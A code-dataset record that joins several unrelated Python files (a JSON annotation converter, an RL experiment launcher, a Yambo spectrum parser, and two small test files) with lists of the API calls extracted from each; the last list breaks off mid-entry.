"s2e_env.... | [((1756, 1788), 'logging.getLogger', 'logging.getLogger', (['"""image_build"""'], {}), "('image_build')\n", (1773, 1788), False, 'import logging\n'), ((2453, 2652), 's2e_env.command.CommandError', 'CommandError', (['f"""You must belong to the {group_name} group in order to build images. Please run the following command, then logout and login:\n\n\tsudo usermod -a -G {group_name} $(whoami)"""'], {}), '(\n f"""You must belong to the {group_name} group in order to build images. Please run the following command, then logout and login:\n\n\tsudo usermod -a -G {group_name} $(whoami)"""\n )\n', (2465, 2652), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((3482, 3503), 'psutil.process_iter', 'psutil.process_iter', ([], {}), '()\n', (3501, 3503), False, 'import psutil\n'), ((4098, 4119), 'psutil.process_iter', 'psutil.process_iter', ([], {}), '()\n', (4117, 4119), False, 'import psutil\n'), ((7044, 7153), 's2e_env.command.CommandError', 'CommandError', (['f"""Invalid image name: {image_name}. Run ``s2e image_build`` to list available images"""'], {}), "(\n f'Invalid image name: {image_name}. Run ``s2e image_build`` to list available images'\n )\n", (7056, 7153), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((7336, 7384), 's2e_env.command.CommandError', 'CommandError', (['f"""Invalid image name {image_name}"""'], {}), "(f'Invalid image name {image_name}')\n", (7348, 7384), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((9183, 9232), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (9196, 9232), False, 'import socket\n'), ((9436, 9453), 'pyftpdlib.authorizers.DummyAuthorizer', 'DummyAuthorizer', ([], {}), '()\n', (9451, 9453), False, 'from pyftpdlib.authorizers import DummyAuthorizer\n'), ((9744, 9783), 'pyftpdlib.servers.FTPServer', 'FTPServer', (["('127.0.0.1', port)", 'handler'], {}), "(('127.0.0.1', port), handler)\n", (9753, 9783), False, 'from pyftpdlib.servers import FTPServer\n'), ((9798, 9843), 'threading.Thread', 'Thread', ([], {'target': '_run_ftp_server', 'args': '[server]'}), '(target=_run_ftp_server, args=[server])\n', (9804, 9843), False, 'from threading import Thread\n'), ((9892, 9905), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (9902, 9905), False, 'import time\n'), ((10709, 10735), 's2e_env.utils.images.ImageDownloader', 'ImageDownloader', (['templates'], {}), '(templates)\n', (10724, 10735), False, 'from s2e_env.utils.images import ImageDownloader, get_image_templates, get_app_templates, get_all_images, translate_image_name\n'), ((1977, 2000), 'pwd.getpwnam', 'pwd.getpwnam', (['user_name'], {}), '(user_name)\n', (1989, 2000), False, 'import pwd\n'), ((4720, 4887), 's2e_env.command.CommandError', 'CommandError', (['"""KVM interface not found - check that /dev/kvm exists. Alternatively, you can disable KVM (-n option) or download pre-built images (-d option)"""'], {}), "(\n 'KVM interface not found - check that /dev/kvm exists. Alternatively, you can disable KVM (-n option) or download pre-built images (-d option)'\n )\n", (4732, 4887), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((5741, 5754), 'sh.touch', 'sh.touch', (['src'], {}), '(src)\n', (5749, 5754), False, 'import sh\n'), ((5763, 5798), 'sh.cp', 'sh.cp', (['"""--reflink=always"""', 'src', 'dst'], {}), "('--reflink=always', src, dst)\n", (5768, 5798), False, 'import sh\n'), ((6952, 6968), 'sh.rm', 'sh.rm', (['"""-f"""', 'src'], {}), "('-f', src)\n", (6957, 6968), False, 'import sh\n'), ((6977, 6993), 'sh.rm', 'sh.rm', (['"""-f"""', 'dst'], {}), "('-f', dst)\n", (6982, 6993), False, 'import sh\n'), ((8162, 8221), 's2e_env.command.CommandError', 'CommandError', (['"""Please update images.json and/or apps.json."""'], {}), "('Please update images.json and/or apps.json.')\n", (8174, 8221), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((10180, 10248), 's2e_env.command.CommandError', 'CommandError', (['"""Building archives of app images is not supported yet"""'], {}), "('Building archives of app images is not supported yet')\n", (10192, 10248), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((10622, 10684), 's2e_env.command.CommandError', 'CommandError', (['"""Downloading of app images is not supported yet"""'], {}), "('Downloading of app images is not supported yet')\n", (10634, 10684), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((13545, 13579), 's2e_env.utils.images.get_image_templates', 'get_image_templates', (['img_build_dir'], {}), '(img_build_dir)\n', (13564, 13579), False, 'from s2e_env.utils.images import ImageDownloader, get_image_templates, get_app_templates, get_all_images, translate_image_name\n'), ((13604, 13636), 's2e_env.utils.images.get_app_templates', 'get_app_templates', (['img_build_dir'], {}), '(img_build_dir)\n', (13621, 13636), False, 'from s2e_env.utils.images import ImageDownloader, get_image_templates, get_app_templates, get_all_images, translate_image_name\n'), ((13687, 13727), 's2e_env.utils.images.get_all_images', 'get_all_images', (['templates', 'app_templates'], {}), '(templates, app_templates)\n', (13701, 13727), False, 'from s2e_env.utils.images import ImageDownloader, get_image_templates, get_app_templates, get_all_images, translate_image_name\n'), ((14056, 14111), 's2e_env.utils.images.translate_image_name', 'translate_image_name', (['images', 'image_groups', 'image_names'], {}), '(images, image_groups, image_names)\n', (14076, 14111), False, 'from s2e_env.utils.images import ImageDownloader, get_image_templates, get_app_templates, get_all_images, translate_image_name\n'), ((15882, 15899), 'os.environ.copy', 'os.environ.copy', ([], {}), '()\n', (15897, 15899), False, 'import os\n'), ((17701, 17729), 'os.path.exists', 'os.path.exists', (['kernels_root'], {}), '(kernels_root)\n', (17715, 17729), False, 'import os\n'), ((18203, 18237), 's2e_env.utils.images.get_image_templates', 'get_image_templates', (['img_build_dir'], {}), '(img_build_dir)\n', (18222, 18237), False, 'from s2e_env.utils.images import ImageDownloader, get_image_templates, get_app_templates, get_all_images, translate_image_name\n'), ((19207, 19239), 's2e_env.utils.images.get_app_templates', 'get_app_templates', (['img_build_dir'], {}), '(img_build_dir)\n', (19224, 19239), False, 'from s2e_env.utils.images import ImageDownloader, get_image_templates, get_app_templates, get_all_images, translate_image_name\n'), ((1926, 1940), 'grp.getgrall', 'grp.getgrall', ([], {}), '()\n', (1938, 1940), False, 'import grp\n'), ((2026, 2043), 'grp.getgrgid', 'grp.getgrgid', (['gid'], {}), '(gid)\n', (2038, 2043), False, 'import grp\n'), ((2162, 2173), 'os.getuid', 'os.getuid', ([], {}), '()\n', (2171, 2173), False, 'import os\n'), ((4669, 4703), 'os.path.join', 'os.path.join', (['os.sep', '"""dev"""', '"""kvm"""'], {}), "(os.sep, 'dev', 'kvm')\n", (4681, 4703), False, 'import os\n'), ((5097, 5136), 'os.path.join', 'os.path.join', (['os.sep', '"""boot"""', '"""vmlinu*"""'], {}), "(os.sep, 'boot', 'vmlinu*')\n", (5109, 5136), False, 'import os\n'), ((5226, 5403), 's2e_env.command.CommandError', 'CommandError', (['"""Make sure that the kernels in /boot are readable. This is required for guestfish. Please run the following command:\n\nsudo chmod ugo+r /boot/vmlinu*"""'], {}), '(\n """Make sure that the kernels in /boot are readable. This is required for guestfish. Please run the following command:\n\nsudo chmod ugo+r /boot/vmlinu*"""\n )\n', (5238, 5403), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((8970, 8997), 'os.path.join', 'os.path.join', (['iso_dir', 'name'], {}), '(iso_dir, name)\n', (8982, 8997), False, 'import os\n'), ((10327, 10366), 'os.path.join', 'os.path.join', (['image_path', 'f"""{r}.tar.xz"""'], {}), "(image_path, f'{r}.tar.xz')\n", (10339, 10366), False, 'import os\n'), ((14530, 14565), 'os.path.abspath', 'os.path.abspath', (["options['iso_dir']"], {}), "(options['iso_dir'])\n", (14545, 14565), False, 'import os\n'), ((15223, 15361), 's2e_env.command.CommandError', 'CommandError', (['f"""localhost:{options[\'ftp_port\']} is not available. Check that the port is free or specify a port with --ftp-port"""'], {}), '(\n f"localhost:{options[\'ftp_port\']} is not available. Check that the port is free or specify a port with --ftp-port"\n )\n', (15235, 15361), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((18295, 18337), 'os.path.join', 'os.path.join', (['img_build_dir', '"""images.json"""'], {}), "(img_build_dir, 'images.json')\n", (18307, 18337), False, 'import os\n'), ((18356, 18466), 's2e_env.command.CommandError', 'CommandError', (['f"""No images available to build. Make sure that {images_json_path} exists and is valid"""'], {}), "(\n f'No images available to build. Make sure that {images_json_path} exists and is valid'\n )\n", (18368, 18466), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((19299, 19339), 'os.path.join', 'os.path.join', (['img_build_dir', '"""apps.json"""'], {}), "(img_build_dir, 'apps.json')\n", (19311, 19339), False, 'import os\n'), ((19358, 19464), 's2e_env.command.CommandError', 'CommandError', (['f"""No apps available to build. Make sure that {apps_json_path} exists and is valid"""'], {}), "(\n f'No apps available to build. Make sure that {apps_json_path} exists and is valid'\n )\n", (19370, 19464), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((3586, 3755), 's2e_env.command.CommandError', 'CommandError', (['"""S2E uses KVM to build images. VirtualBox is currently running, which is not compatible with KVM. Please close all VirtualBox VMs and try again."""'], {}), "(\n 'S2E uses KVM to build images. VirtualBox is currently running, which is not compatible with KVM. Please close all VirtualBox VMs and try again.'\n )\n", (3598, 3755), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((4200, 4361), 's2e_env.command.CommandError', 'CommandError', (['"""S2E uses KVM to build images. VMware is currently running, which is not compatible with KVM. Please close all VMware VMs and try again."""'], {}), "(\n 'S2E uses KVM to build images. VMware is currently running, which is not compatible with KVM. Please close all VMware VMs and try again.'\n )\n", (4212, 4361), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((6858, 6907), 're.sub', 're.sub', (['"""^ {8}"""', '""""""', 'warn_msg'], {'flags': 're.MULTILINE'}), "('^ {8}', '', warn_msg, flags=re.MULTILINE)\n", (6864, 6907), False, 'import re\n'), ((8787, 8898), 's2e_env.command.CommandError', 'CommandError', (['f"""Please use the --iso-dir option to specify the path to a folder that contains {name}"""'], {}), "(\n f'Please use the --iso-dir option to specify the path to a folder that contains {name}'\n )\n", (8799, 8898), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((9017, 9037), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (9031, 9037), False, 'import os\n'), ((9061, 9147), 's2e_env.command.CommandError', 'CommandError', (['f"""The image {image_name} requires {path}, which could not be found"""'], {}), "(\n f'The image {image_name} requires {path}, which could not be found')\n", (9073, 9147), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((17558, 17573), 's2e_env.command.CommandError', 'CommandError', (['e'], {}), '(e)\n', (17570, 17573), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((17100, 17118), 'sh.Command', 'sh.Command', (['"""make"""'], {}), "('make')\n", (17110, 17118), False, 'import sh\n'), ((17129, 17168), 'os.path.join', 'os.path.join', (['img_build_dir', '"""Makefile"""'], {}), "(img_build_dir, 'Makefile')\n", (17141, 17168), False, 'import os\n')] |
import json
from PIL import Image
with open('/home/tianpei.qian/workspace/data_local/sl4_front_1.0/sl4_side_val_1.7.json') as f:
val_1_7 = json.load(f)
with open('sl4_side_val_1.7/results.json') as f:
new_1_8 = json.load(f)
ROOT = '/home/tianpei.qian/workspace/data_local/sl4_front_1.0/'
for old, new in zip(val_1_7, new_1_8):
assert old['file'] == new['file']
im = Image.open(ROOT + old['file'])
im_width, im_height = im.size
for box in new['detections']:
new_box = {}
x_min, x_max, y_min, y_max = box['x_min'], box['x_max'], box['y_min'], box['y_max']
width, height = x_max - x_min, y_max - y_min
new_box['coord'] = [(x_min + x_max) / 2 / im_width, (y_min + y_max) / 2 / im_height, width / im_width, height / im_height]
new_box['meta'] = {'isfrontcar': False}
new_box['class'] = box['kind']
new_box['occluded'] = 'none'
new_box['score'] = box['score']
old['boxes'].append(new_box)
with open('/home/tianpei.qian/workspace/data_local/sl4_front_1.0/sl4_side_val_1.8.json', 'w') as f:
json.dump(val_1_7, f) | [
"json.load",
"PIL.Image.open",
"json.dump"
] | [((144, 156), 'json.load', 'json.load', (['f'], {}), '(f)\n', (153, 156), False, 'import json\n'), ((221, 233), 'json.load', 'json.load', (['f'], {}), '(f)\n', (230, 233), False, 'import json\n'), ((386, 416), 'PIL.Image.open', 'Image.open', (["(ROOT + old['file'])"], {}), "(ROOT + old['file'])\n", (396, 416), False, 'from PIL import Image\n'), ((1090, 1111), 'json.dump', 'json.dump', (['val_1_7', 'f'], {}), '(val_1_7, f)\n', (1099, 1111), False, 'import json\n')] |
"""
Generate data for ablation analysis for ICML 2017 workshop paper.
"""
import random
from torch.nn import functional as F
from railrl.envs.pygame.water_maze import (
WaterMazeMemory,
)
from railrl.exploration_strategies.ou_strategy import OUStrategy
from railrl.launchers.launcher_util import (
run_experiment,
)
from railrl.launchers.memory_bptt_launchers import bptt_ddpg_launcher
from railrl.pythonplusplus import identity
from railrl.memory_states.qfunctions import MemoryQFunction
from railrl.torch.rnn import GRUCell
if __name__ == '__main__':
n_seeds = 1
mode = "here"
exp_prefix = "dev-generate-bellman-ablation-figure-data"
run_mode = 'none'
n_seeds = 5
mode = "ec2"
exp_prefix = "generate-bellman_ablation-figure-data"
use_gpu = True
if mode != "here":
use_gpu = False
H = 25
subtraj_length = None
num_steps_per_iteration = 1000
num_steps_per_eval = 1000
num_iterations = 100
batch_size = 100
memory_dim = 100
version = "Our Method"
# noinspection PyTypeChecker
variant = dict(
memory_dim=memory_dim,
env_class=WaterMazeMemory,
env_params=dict(
horizon=H,
give_time=True,
),
memory_aug_params=dict(
max_magnitude=1,
),
algo_params=dict(
subtraj_length=subtraj_length,
batch_size=batch_size,
num_epochs=num_iterations,
num_steps_per_epoch=num_steps_per_iteration,
num_steps_per_eval=num_steps_per_eval,
discount=0.9,
use_action_policy_params_for_entire_policy=False,
action_policy_optimize_bellman=False,
write_policy_optimizes='bellman',
action_policy_learning_rate=0.001,
write_policy_learning_rate=0.0005,
qf_learning_rate=0.002,
max_path_length=H,
refresh_entire_buffer_period=None,
save_new_memories_back_to_replay_buffer=True,
write_policy_weight_decay=0,
action_policy_weight_decay=0,
do_not_load_initial_memories=False,
save_memory_gradients=False,
),
qf_class=MemoryQFunction,
qf_params=dict(
output_activation=identity,
fc1_size=400,
fc2_size=300,
ignore_memory=False,
),
policy_params=dict(
fc1_size=400,
fc2_size=300,
cell_class=GRUCell,
output_activation=F.tanh,
only_one_fc_for_action=False,
),
es_params=dict(
env_es_class=OUStrategy,
env_es_params=dict(
max_sigma=1,
min_sigma=None,
),
memory_es_class=OUStrategy,
memory_es_params=dict(
max_sigma=1,
min_sigma=None,
),
),
version=version,
)
for subtraj_length in [1, 5, 10, 15, 20, 25]:
variant['algo_params']['subtraj_length'] = subtraj_length
for exp_id, (
write_policy_optimizes,
version,
) in enumerate([
("bellman", "Bellman Error"),
("qf", "Q-Function"),
("both", "Both"),
]):
variant['algo_params']['write_policy_optimizes'] = (
write_policy_optimizes
)
variant['version'] = version
for _ in range(n_seeds):
seed = random.randint(0, 10000)
run_experiment(
bptt_ddpg_launcher,
exp_prefix=exp_prefix,
seed=seed,
mode=mode,
variant=variant,
exp_id=exp_id,
)
| [
"random.randint",
"railrl.launchers.launcher_util.run_experiment"
] | [((3523, 3547), 'random.randint', 'random.randint', (['(0)', '(10000)'], {}), '(0, 10000)\n', (3537, 3547), False, 'import random\n'), ((3564, 3680), 'railrl.launchers.launcher_util.run_experiment', 'run_experiment', (['bptt_ddpg_launcher'], {'exp_prefix': 'exp_prefix', 'seed': 'seed', 'mode': 'mode', 'variant': 'variant', 'exp_id': 'exp_id'}), '(bptt_ddpg_launcher, exp_prefix=exp_prefix, seed=seed, mode=\n mode, variant=variant, exp_id=exp_id)\n', (3578, 3680), False, 'from railrl.launchers.launcher_util import run_experiment\n')] |
"""Classes for use with Yambo
Representation of a spectrum.
Main functionality is to read from Yambo output, o.qp files
and also netcdf databases.
"""
import re
import copy as cp
import numpy as np
import asetk.atomistic.fundamental as fu
import asetk.atomistic.constants as atc
from . import cube
class Dispersion:
"""A Dispersion holds the k-points belonging to one spin"""
def __init__(self, energylevels=None, kvectors=None, weights=None):
"""Set up spectrum from a list of EnergyLevels."""
self.__energylevels = energylevels
self.__kvectors = kvectors
self.__weights = weights
@property
def energylevels(self):
"""Returns energylevelsi of all k-points."""
return self.__energylevels
@property
def kvectors(self):
return self.__kvectors
@property
def weights(self):
return self.__weights
@property
def energies(self):
"""Returns list of energy levels of all k-points."""
list = [el.energies for el in self.__energylevels]
return np.concatenate(list)
@property
def occupations(self):
"""Returns list of level occupations of all k-points."""
os = []
for el in self.__energylevels:
os = os + list(el.occupations)
return os
def copy(self, dispersion):
"""Performs deep copy of dispersion."""
self.__energylevels = [ el.copy() for el in dispersion.__energylevels ]
self.__kvectors = cp.copy(spectrum.__kvectors)
self.__weights = cp.copy(spectrum.__weights)
def shift(self, de):
for levels in self.__energylevels:
levels.shift(de)
def __str__(self):
text = "Dispersion containing {} k-points\n".format(len(self.__energylevels))
for i in range(len(self.__energylevels)):
e = self.__energylevels[i]
k = self.__kvectors[i]
text += 'k = ({:6.3f}, {:6.3f}, {:6.3f})'.format(k[0], k[1], k[2])
if self.__weights:
w = self.__weights[i]
text += ', w = {}'.format(w)
text += ' : {}\n'.format(e.__str__())
return text
def __getitem__(self, index):
return self.__energylevels[index]
@property
def nk(self):
return len(self.energylevels)
class Spectrum(object):
"""A Spectrum holds the data belonging to all spins"""
def __init__(self, energylevels=None):
"""Set up spectrum from a list of EnergyLevels."""
self.dispersions = [ Dispersion(energylevels) ]
@classmethod
def from_output(cls, fname, mode='QP'):
"""Creates Spectrum from Yambo output file"""
tmp = Spectrum()
tmp.read_from_output(fname, mode)
return tmp
@classmethod
def from_qp(cls, fname=None, mode='QP'):
"""Creates Spectrum from Yambo o.qp file"""
tmp = Spectrum()
tmp.read_from_qp(fname, mode)
return tmp
@classmethod
def from_netcdf_db(cls, fname=None, mode='QP'):
"""Creates Spectrum from Yambo netcdf database"""
tmp = Spectrum()
tmp.read_from_netcdf_db(fname, mode=mode)
return tmp
@property
def energies(self):
"""Returns list of energies e[ispin][ibnd]."""
list = [disp.energies for disp in self.dispersions]
return list
@property
def energylevels(self):
"""Returns list of Energylevels l[ispin][ibnd]."""
list = []
for d in self.dispersions:
sum = fu.Energylevels()
for el in d.energylevels:
sum += el
list.append(sum)
return list
@property
def occupations(self):
"""Returns list of level occupations of all spins."""
os = []
for disp in self.dispersions:
os = os + disp.occupations
return os
@property
def nspin(self):
return len(self.dispersions)
def copy(self, spectrum):
"""Performs deep copy of spectrum."""
self.dispersions = [ el.copy() for el in spectrum.dispersions ]
self.spins = cp.copy(spectrum.spins)
def shift(self, de):
for disp in self.dispersions:
disp.shift(de)
def __str__(self):
text = "Spectrum containing {} spins\n".format(len(self.dispersions))
for i in range(len(self.dispersions)):
d = self.dispersions[i]
s = self.spins[i]
text += 'spin {} : {}\n'.format(s+1, d.__str__())
return text
def __getitem__(self, index):
return self.levels[index]
def read_from_output(self, fname, mode=None):
s = open(fname, 'r').read()
floatregex = '-?\d+\.\d+'
lineregex='[^\r\n]*\r?\n'
#blanklineregex='(?:^\s*$)'
if mode == 'DFT' or mode == None:
kptregex = 'X\* K.*?: ({f})\s*({f})\s*({f}).*?weight\s*({f}){l}(.*?)[\*\[]'\
.format(f=floatregex,l=lineregex)
fermiregex='Fermi Level.*?:(\s*[\-\d\.]+)'
elif mode == 'QP':
kptregex = 'Q?P \[eV\].*?:\s*({f})\s+({f})\s+({f})(.*?)[Q\[]'\
.format(f=floatregex)
self.spins=[]
self.dispersions=[]
# No spin for the moment, but shouldn't be too difficult to extend
for spin in [0]:
disp = Dispersion()
matches=re.findall(kptregex, s, re.DOTALL)
if mode == 'DFT' or mode == None:
fermi = float(re.search(fermiregex, s).group(1))
energylevels = []
kvectors = []
weights = []
for match in matches:
kx, ky, kz, weight, ldata = match
kvectors.append( np.array([kx, ky, kz], dtype=float) )
weights.append( float(weight) )
energies = re.findall('({f})'.format(f=floatregex), ldata, re.DOTALL)
energies = np.array(energies, dtype=float)
levels = fu.EnergyLevels(energies=energies,occupations=None, fermi=fermi)
energylevels.append(levels)
disp = Dispersion(energylevels=energylevels, kvectors=kvectors, weights=weights)
elif mode == 'QP':
energylevels = []
kvectors = []
for match in matches:
kx, ky, kz, ldata = match
kvectors.append( np.array([kx, ky, kz], dtype=float) )
energies = re.findall('E=\s*({f})'.format(f=floatregex), ldata, re.DOTALL)
energies = np.array(energies, dtype=float)
levels = fu.EnergyLevels(energies=energies)
energylevels.append(levels)
disp = Dispersion(energylevels=energylevels, kvectors=kvectors)
self.dispersions.append(disp)
self.spins.append(spin)
def read_from_qp(self, fname="o.qp", ihomo=None):
"""Read from o.qp output (has more digits than in report.
Anyhow, the proper way would be to read the database"""
s = open(fname, 'r').read()
data = np.genfromtxt(fname, dtype=float)
energies = data[:,2] + data[:,3]
# setting HOMO to zero
if ihomo:
energies -= energies[ihomo]
self.spins=[]
self.dispersions=[]
# No spin for the moment, but shouldn't be too difficult to extend
for spin in [0]:
levels = fu.EnergyLevels(energies=energies,occupations=None)
disp = Dispersion(energylevels=[levels], kvectors = [ (0,0,0) ] )
self.dispersions.append(disp)
self.spins.append(spin)
def read_from_netcdf_db(self, fname="ndb.QP", mode="QP"):
"""Read from netCDF database
requires netCDF4 python module"""
from netCDF4 import Dataset
f = Dataset(fname, 'r')
SPIN_VARS = f.variables['SPIN_VARS'][:]
QP_kpts = f.variables['QP_kpts'][:]
QP_table = f.variables['QP_table'][:]
QP_E_Eo_Z = f.variables['QP_E_Eo_Z'][:]
f.close()
nspin = len(SPIN_VARS)
nk = QP_kpts.shape[1]
kpts = [ QP_kpts[:,ik] for ik in range(nk) ]
ibnds, dum, iks, ispins = QP_table
nbnd = len(ibnds) / (nspin * nk)
if mode == "QP":
iener = 0
elif mode == "DFT":
iener = 1
else:
print("Error: Did not recognize mode '{}'.".format(mode))
self.spins=[]
self.dispersions=[]
for ispin in range(nspin):
is_spin = np.where(ispins == SPIN_VARS[ispin])[0]
energylevels = []
kvectors = []
for ik in range(nk):
k = kpts[ik]
is_k = np.where(iks == ik+1)[0]
# still need to figure out the first index
# is it real vs. complex?
e = QP_E_Eo_Z[0, np.intersect1d(is_spin,is_k), iener] * atc.Ha / atc.eV
levels = fu.EnergyLevels(energies=e,occupations=None)
kvectors.append(k)
energylevels.append(levels)
disp = Dispersion(energylevels=energylevels, kvectors = kvectors)
self.dispersions.append(disp)
self.spins.append(ispin)
## setting HOMO to zero
#if ihomo:
# energies -= energies[ihomo]
| [
"numpy.intersect1d",
"numpy.where",
"netCDF4.Dataset",
"asetk.atomistic.fundamental.Energylevels",
"re.findall",
"numpy.array",
"numpy.concatenate",
"copy.copy",
"numpy.genfromtxt",
"asetk.atomistic.fundamental.EnergyLevels",
"re.search"
] | [((1070, 1090), 'numpy.concatenate', 'np.concatenate', (['list'], {}), '(list)\n', (1084, 1090), True, 'import numpy as np\n'), ((1501, 1529), 'copy.copy', 'cp.copy', (['spectrum.__kvectors'], {}), '(spectrum.__kvectors)\n', (1508, 1529), True, 'import copy as cp\n'), ((1555, 1582), 'copy.copy', 'cp.copy', (['spectrum.__weights'], {}), '(spectrum.__weights)\n', (1562, 1582), True, 'import copy as cp\n'), ((4129, 4152), 'copy.copy', 'cp.copy', (['spectrum.spins'], {}), '(spectrum.spins)\n', (4136, 4152), True, 'import copy as cp\n'), ((7232, 7265), 'numpy.genfromtxt', 'np.genfromtxt', (['fname'], {'dtype': 'float'}), '(fname, dtype=float)\n', (7245, 7265), True, 'import numpy as np\n'), ((7987, 8006), 'netCDF4.Dataset', 'Dataset', (['fname', '"""r"""'], {}), "(fname, 'r')\n", (7994, 8006), False, 'from netCDF4 import Dataset\n'), ((3540, 3557), 'asetk.atomistic.fundamental.Energylevels', 'fu.Energylevels', ([], {}), '()\n', (3555, 3557), True, 'import asetk.atomistic.fundamental as fu\n'), ((5402, 5436), 're.findall', 're.findall', (['kptregex', 's', 're.DOTALL'], {}), '(kptregex, s, re.DOTALL)\n', (5412, 5436), False, 'import re\n'), ((7585, 7637), 'asetk.atomistic.fundamental.EnergyLevels', 'fu.EnergyLevels', ([], {'energies': 'energies', 'occupations': 'None'}), '(energies=energies, occupations=None)\n', (7600, 7637), True, 'import asetk.atomistic.fundamental as fu\n'), ((8712, 8748), 'numpy.where', 'np.where', (['(ispins == SPIN_VARS[ispin])'], {}), '(ispins == SPIN_VARS[ispin])\n', (8720, 8748), True, 'import numpy as np\n'), ((9134, 9179), 'asetk.atomistic.fundamental.EnergyLevels', 'fu.EnergyLevels', ([], {'energies': 'e', 'occupations': 'None'}), '(energies=e, occupations=None)\n', (9149, 9179), True, 'import asetk.atomistic.fundamental as fu\n'), ((5987, 6018), 'numpy.array', 'np.array', (['energies'], {'dtype': 'float'}), '(energies, dtype=float)\n', (5995, 6018), True, 'import numpy as np\n'), ((6048, 6113), 'asetk.atomistic.fundamental.EnergyLevels', 'fu.EnergyLevels', ([], {'energies': 'energies', 'occupations': 'None', 'fermi': 'fermi'}), '(energies=energies, occupations=None, fermi=fermi)\n', (6063, 6113), True, 'import asetk.atomistic.fundamental as fu\n'), ((8895, 8918), 'numpy.where', 'np.where', (['(iks == ik + 1)'], {}), '(iks == ik + 1)\n', (8903, 8918), True, 'import numpy as np\n'), ((5774, 5809), 'numpy.array', 'np.array', (['[kx, ky, kz]'], {'dtype': 'float'}), '([kx, ky, kz], dtype=float)\n', (5782, 5809), True, 'import numpy as np\n'), ((6661, 6692), 'numpy.array', 'np.array', (['energies'], {'dtype': 'float'}), '(energies, dtype=float)\n', (6669, 6692), True, 'import numpy as np\n'), ((6722, 6756), 'asetk.atomistic.fundamental.EnergyLevels', 'fu.EnergyLevels', ([], {'energies': 'energies'}), '(energies=energies)\n', (6737, 6756), True, 'import asetk.atomistic.fundamental as fu\n'), ((5515, 5539), 're.search', 're.search', (['fermiregex', 's'], {}), '(fermiregex, s)\n', (5524, 5539), False, 'import re\n'), ((6496, 6531), 'numpy.array', 'np.array', (['[kx, ky, kz]'], {'dtype': 'float'}), '([kx, ky, kz], dtype=float)\n', (6504, 6531), True, 'import numpy as np\n'), ((9054, 9083), 'numpy.intersect1d', 'np.intersect1d', (['is_spin', 'is_k'], {}), '(is_spin, is_k)\n', (9068, 9083), True, 'import numpy as np\n')] |
import unittest
import os
import json
import pandas as pd
import numpy as np
class TestingExercise2_07(unittest.TestCase):
def setUp(self) -> None:
ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(ROOT_DIR, '..', 'dtypes.json'), 'r') as jsonfile:
self.dtyp = json.load(jsonfile)
self.data = pd.read_csv(os.path.join(ROOT_DIR, '..', 'Datasets', 'earthquake_data.csv'),
dtype = self.dtyp)
def test_object_vars(self):
self.object_variables = self.data.select_dtypes(include = [np.object]).nunique().sort_values()
self.assertEqual(max(self.object_variables), (3821))
if __name__ == '__main__':
unittest.main() | [
"unittest.main",
"json.load",
"os.path.abspath",
"os.path.join"
] | [((718, 733), 'unittest.main', 'unittest.main', ([], {}), '()\n', (731, 733), False, 'import unittest\n'), ((188, 213), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (203, 213), False, 'import os\n'), ((321, 340), 'json.load', 'json.load', (['jsonfile'], {}), '(jsonfile)\n', (330, 340), False, 'import json\n'), ((373, 436), 'os.path.join', 'os.path.join', (['ROOT_DIR', '""".."""', '"""Datasets"""', '"""earthquake_data.csv"""'], {}), "(ROOT_DIR, '..', 'Datasets', 'earthquake_data.csv')\n", (385, 436), False, 'import os\n'), ((234, 277), 'os.path.join', 'os.path.join', (['ROOT_DIR', '""".."""', '"""dtypes.json"""'], {}), "(ROOT_DIR, '..', 'dtypes.json')\n", (246, 277), False, 'import os\n')] |
from uuid import UUID
from sqlalchemy import select, bindparam
from nivo_api.cli.bra_record_helper.persist import persist_zone, persist_massif
from nivo_api.core.db.connection import connection_scope
from nivo_api.core.db.models.sql.bra import ZoneTable, DepartmentTable, MassifTable
from test.pytest_fixtures import database
class TestPersistZone:
def test_insert_zone(self, database):
with connection_scope(database.engine) as con:
r = persist_zone(con, "this_is_a_test")
assert isinstance(r, UUID)
def test_multi_insert(self, database):
with connection_scope(database.engine) as con:
uuid_list = list()
for _ in range(5):
uuid_list.append(persist_zone(con, "this_is_a_test"))
for x in uuid_list:
assert isinstance(x, UUID)
assert all(x == uuid_list[0] for x in uuid_list)
class TestPersistMassif:
def test_massif(self, database):
with connection_scope(database.engine) as con:
r = persist_massif(
con,
"CHABLAIS",
{"name": "Haute-savoie", "number": "74"},
"Alpes du Nord",
)
assert isinstance(r, UUID)
def test_multi_massif(self, database):
with connection_scope(database.engine) as con:
r1 = persist_massif(
con,
"CHABLAIS",
{"name": "Haute-savoie", "number": "74"},
"Alpes du Nord",
)
r2 = persist_massif(
con,
"MONT-BLANC",
{"name": "Haute-savoie", "number": "74"},
"Alpes du Nord",
)
assert isinstance(r1, UUID)
assert isinstance(r2, UUID)
req = (
select([ZoneTable.c.z_id, DepartmentTable.c.d_id])
.select_from(ZoneTable.join(DepartmentTable).join(MassifTable))
.where(MassifTable.c.m_id == bindparam("massif"))
)
id1 = con.execute(req, massif=r1).first()
id2 = con.execute(req, massif=r2).first()
assert id1.z_id == id2.z_id
assert id1.d_id == id2.d_id
class TestPersistBra:
def test_persist_bra(self):
raise NotImplementedError()
| [
"nivo_api.core.db.connection.connection_scope",
"nivo_api.cli.bra_record_helper.persist.persist_zone",
"sqlalchemy.bindparam",
"sqlalchemy.select",
"nivo_api.core.db.models.sql.bra.ZoneTable.join",
"nivo_api.cli.bra_record_helper.persist.persist_massif"
